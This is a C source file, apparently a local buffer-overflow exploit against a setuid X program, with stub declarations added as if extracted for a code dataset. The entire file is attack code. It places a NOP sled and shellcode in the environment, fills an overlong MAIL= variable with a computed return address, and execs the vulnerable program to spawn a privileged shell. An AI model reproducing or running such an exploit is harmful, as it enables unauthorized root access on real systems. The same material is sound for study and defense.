
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


typedef int uid_t ;
typedef int eggbuf ;
typedef int display ;
typedef int buf ;
struct TYPE_3__ {int pw_dir; } ;


 int DISPENV ;
 unsigned int NOP ;
 int SP ;
 char* VULPROG ;
 int bzero (char*,int) ;
 int execve (char*,char**,char**) ;
 long get_shelladdr (long,char**,char**,int) ;
 int get_sp () ;
 char* getcwd (char*,int) ;
 char* getenv (char*) ;
 TYPE_1__* getpwuid (int ) ;
 scalar_t__ getuid () ;
 int memcpy (char*,char*,int) ;
 int memset (char*,char,long) ;
 int perror (char*) ;
 int printf (char*,...) ;
 TYPE_1__* pwd ;
 char* shellcode ;
 int snprintf (char*,int,char*,char*) ;
 char* strdup (int ) ;
 int strlen (char*) ;
 int strncpy (char*,int ,int) ;

int
main(int argc, char **argv)
{
        char buf[4096], home[128], display[256];
        char eggbuf[2048];
        long retaddr, sp_addr = SP;
        char *arg[24], *env[24], *cwd, *charptr;
        char padding[64], padding1[64];
        unsigned int *ptr;
        char *disp;
        char ev1[] = "MAIL=";
        long ev1_len, i, align;
        long overbuflen = 2048;

        if (argc > 1)
                snprintf(display, sizeof(display) - 1, "DISPLAY=%s", argv[1]);
        else {
                disp = getenv("DISPLAY");
                if (disp)
                        snprintf(display, sizeof(display) - 1, "DISPLAY=%s", disp);
                else
                        strncpy(display, DISPENV, sizeof(display) - 1);
        }

        pwd = getpwuid((uid_t) getuid());
        snprintf(home, 127, "HOME=%s", strdup(pwd->pw_dir));

        arg[0] = VULPROG;
        arg[1] = ((void*)0);

        cwd = getcwd((char *) ((void*)0), 256);
        overbuflen = overbuflen - (strlen(cwd) + strlen("/"));
        ev1_len = strlen(ev1);
        bzero(buf, sizeof(buf));
        memcpy(buf, ev1, ev1_len);
        memset(buf + ev1_len, 'A', overbuflen);

        bzero(eggbuf, sizeof(eggbuf));
        ptr = (unsigned int *) eggbuf;
        for (i = 0; i < sizeof(eggbuf) - strlen(shellcode); i += 4)
                *(ptr + i / 4) = NOP;
        memcpy(eggbuf + i - 4, shellcode, strlen(shellcode));

        env[0] = padding;
        env[1] = eggbuf;
        env[2] = padding1;
        env[3] = buf;
        env[4] = display;
        env[5] = home;
        env[6] = ((void*)0);


        if (((unsigned char) (get_sp() >> 24)) == 0xef) {
                sp_addr = SP - 0x0fbf0000;
        }
        retaddr = get_shelladdr(sp_addr, arg, env, -8);

        retaddr -= 8;
        printf("Using  return address = 0x%x (shelladdrr - 8)\n", retaddr);
        printf("Click Local in your X window\n\n");

        charptr = (char *) &retaddr;
        align = 4 - ((strlen(cwd) + strlen("/")) % 4);
        for (i = 0; i < overbuflen - align; i++)
                buf[ev1_len + align + i] = *(charptr + i % 4);


        execve(VULPROG, arg, env);
        perror("execle");
}
